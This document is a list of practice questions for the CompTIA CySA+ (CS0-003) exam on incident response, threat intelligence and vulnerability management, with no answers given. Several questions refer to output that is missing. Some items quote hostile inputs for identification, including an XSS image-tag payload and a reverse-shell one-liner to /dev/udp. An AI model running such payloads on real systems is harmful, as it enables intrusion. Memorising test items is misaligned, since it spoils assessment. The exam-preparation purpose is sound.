CYSA+ 003

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?. A. Changes to system environment variables. B. SMB network traffic related to the system process. C. Recent browser history of the primary user. D. Activities taken by PID 1024.

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?. A. Upload the binary to an air-gapped sandbox for analysis. B. Send the binaries to the antivirus vendor. C. Execute the binaries on an environment with internet connectivity. D. Query the file hashes using VirusTotal.

A technician is analyzing output from a popular network mapping tool for a PCI audit: Which of the following best describes the output?. A. The host is not up or responding. B. The host is running excessive cipher suites. C. The host is allowing insecure cipher suites. D. The Secure Shell port on this host is closed.

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?. A. SIEM. B. XDR. C. SOAR. D. EDR.

While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript:msgbox("test")' > Which of the following malicious activities was attempted?. A. Command injection. B. XML injection. C. Server-side request forgery. D. Cross site Scripting.

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?. A. Business continuity plan. B. Vulnerability management plan. C. Disaster recovery plan. D. Asset management plan.

An incident response team member is triaging a Linux server. The output is shown below: Which of the following is the adversary most likely trying to do?. A. Create a backdoor root account named zsh. B. Execute commands through an unsecured service account. C. Send a beacon to a command-and-control server. D. Perform a denial-of-service attack on the web server.

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two). A. Drop the tables on the database server to prevent data exfiltration. B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities. C. Stop the httpd service on the web server so that the adversary can not use web exploits. D. Use microsegmentation to restrict connectivity to/from the web and database servers. E. Comment out the HTTP account in the /etc/passwd file of the web server. F. Move the database from the database server to the web server.

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings?. A. Ask the web development team to update the page contents. B. Add the IP address allow listing for control panel access. C. Purchase an appropriate certificate from a trusted root CA. D. Perform proper sanitization on all fields.

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?. A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }. B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }. C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }. D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }.

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?. A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }. B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }. C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }. D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }.

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?. A. C2 beaconing activity. B. Data exfiltration. C. Anomalous activity on unexpected ports. D. Network host IP address scanning. E. A rogue network device.

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?. A. Reduce the administrator and privileged access accounts. B. Employ a network-based IDS. C. Conduct thorough incident response. D. Enable SSO to enterprise applications.

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?. A. MITRE ATT&CK. B.Cyber Kill Cham. C.OWASP. D.STIX/TAXII.

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?. A. Single pane of glass. B. Single sign-on. C. Data enrichment. D. Deduplication.

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?. A. Instruct the firewall engineer that a rule needs to be added to block this external server. B. Escalate the event to an incident and notify the SOC manager of the activity. C. Notify the incident response team that there is a DDoS attack occurring. D. Identify the IP/hostname for the requests and look at the related activity.

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?. A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }. B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }. C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }. D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }.

An analyst is reviewing a vulnerability report for a server environment with the following entries: Which of the following systems should be prioritized for patching first?. A. 10.101.27.98. B. 54.73.225.17. C. 54.74.110.26. D. 54.74.110.228.

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?. A. Scope. B. Weaponization. C. CVSS. D. Asset Value.

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?. A. RCE. B. Reverse Shell. C. XSS. D. SQL Injection.